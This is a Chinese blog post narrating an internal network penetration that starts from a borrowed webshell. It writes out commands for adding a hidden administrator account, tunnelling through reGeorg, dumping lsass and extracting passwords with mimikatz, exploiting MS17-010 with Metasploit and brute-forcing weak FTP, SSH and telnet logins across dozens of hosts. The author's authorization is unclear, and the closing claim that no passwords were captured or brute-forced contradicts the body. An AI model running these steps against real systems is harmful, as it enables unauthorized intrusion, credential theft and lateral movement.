内网渗透实战（二）

一直少有机会接触内网渗透实战，最近刚好借助正在参加比赛的大佬施舍的webshell来复习一下。
注：本次渗透未授权期内项目，渗透手段未超出约束范围，敏感信息均已打码。

信息梳理

从webshell开始吧，先进行简单的信息梳理：目标服务器为内网服务器，无公网IP，当前权限为最高权限system。

查看下arp缓存，未发现有其他网段的存在：

查看系统信息，没有所属域：

添加用户

#启用guest用户
net user guest /active:yes
#修改guest用户密码
net user guest 1q2w3e4r!
#添加管理员用户组
net localgroup administrators guest /add

设置代理

内网渗透思路拓展需要，本次教程决定放弃msf+frp的组合，采用reGeorg+Proxifier进行本次任务。

python .\reGeorgSocksProxy.py -p 1988 -u target_url(脚本url)

配置Proxifier代理服务器：

配置并启用规则：

密码获取

登录目标服务器：

第一想法自然是mimikatz，然而翻车了，虽然已经是管理员权限，但非最高权限，本处没有成功：

privilege::debug#提权
sekurlsa::logonpasswords#抓取密码

于是转战另一种方案Procdump+Mimikatz：
Procdump由微软官方提供：
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

#导出lsass.exe进程
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
#使用mimikatz破解导出的文件lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

获取明文密码及hash，我们可以看到我们刚刚启用的guest：

当然，还有administrator的明文密码：

用户信息搜集

登录administrator用户，刚登上去的一瞬间慌的一批，以为将管理员顶下来了，查看任务管理器发现还好开启了单用户多人登录的设置，233333。

咳咳，稳住，不要忘记本次渗透测试任务的目标：内网
开始用户信息搜集：
1）192.168.100.35应该是个比较重要的点：

2）192.168.100.51部署了vmware vsphere

3）居然开着个ssh连接，192.168.100.50买一赠一？

4）从管理员常用软件分析，发现了所使用的百度网盘且保存了密码，23333：

内网端口探测

代理端口扫描工具对内网进行轻度探测（nmap流量太大）：

发现了几个内网web应用，不知道有没有对应外网，接下来当然是对找到的系统进行密码爆破，毕竟内网密码这一块都会松懈，其中不乏一些内网网络相关的管理系统，这里就不放图啦。

永恒之蓝

永恒之蓝专项检测，喜提服务器X9：），来利用一下，emmmm，虽然说过本次不上msf，但确实没见过永恒之蓝的exp，么得办法，真香。

首先将本机权限拉满，以防不测：

添加路由，准备内网探测：

run get_local_subnets    获取当前网段
run  autoroute -s 192.168.100.0/24  添加路由
run autoroute -p    路由查询

使用ms17_010检测模块简单确认下，基本跟我们刚刚跑的结果一致：

use auxiliary/scanner/smb/smb_ms17_010

然后开始ms17_010利用，我使用了两个脚本，第一个虽然主流一点但并没有成功，最终选择了第二个，关于它们的选择大家可以参见我的metasploit系列教程：

use exploit/windows/smb/ms17_010_eternalblue
use admin/smb/ms17_010_command

借助ms17_010_command进行用户创建并添加用户组

net user gvest 1q2w3e4r! /add  
net localgroup administrators gvest /add

成功登录目标服务器192.168.100.1：

成功登录上传mimikatz直接获得administrator明文密码，使用参考上面，不过这里没有用到Procdump。

随后发现该密码为通用密码，内网内多台服务器均使用该密码，得，剩下的也不用再演示啦，重复性工作没什么可说的。

弱口令测试

然后我们再来捡捡漏，接下来开始对内网弱口令情况深度检测，发现以下内容：

其中ftp泄露了大量敏感文件：

这里顺便给大家案例个连接工具吧：mobaxterm，支持多种协议的远程连接：

ssh访问爆出的几个弱口令发现，只有一台是linux服务器，还有一台是RG-ACE流控设备，还有一台没看懂>.<，该好好补课了的说。

同样telnet弱口令也属于该设备：

Memcached应该是开启了限制本地访问还是怎么，telnet连接目标服务器端口反馈为error。

END

那么，本次测试暂告一段落吧。
一直想找一个存在域的内网操练，可惜这次依然没有遇到，可能太过敏感东西在本文中简单略过了，但不得不说我的内网渗透的思路依然混乱，借朋友的话说：就是拿着WEB渗透的思路在内网转悠没有方向，手里拿着思维导图却在迷茫。内网经验欠缺，还请大佬轻喷，鞠躬QAQ！

总结：

说明：本次渗透仅供比赛需要，同时也是用户隐私需求，没有对数据或系统口令做任何形式的爆破或获取，仅在服务器权限上进行了游荡。跳板服务器为192.168.100.191，最终获得服务器包括192.168.100.1在内的数十台服务器，除此以外还包括ftp、telnet等协议弱口令多个，收工~

经验：因为服务器处于内网，所以s5代理受限存在卡顿且对大数据流无法承受，我调用了目标服务器的TeamViewer用来传输文件，真香。对于内网全网的弱口令批量扫描等行为尽可能放到目标服务器上来做，原因同样是网络流量大的问题。

日常：再次催更MS08067实验室《内网安全攻防》！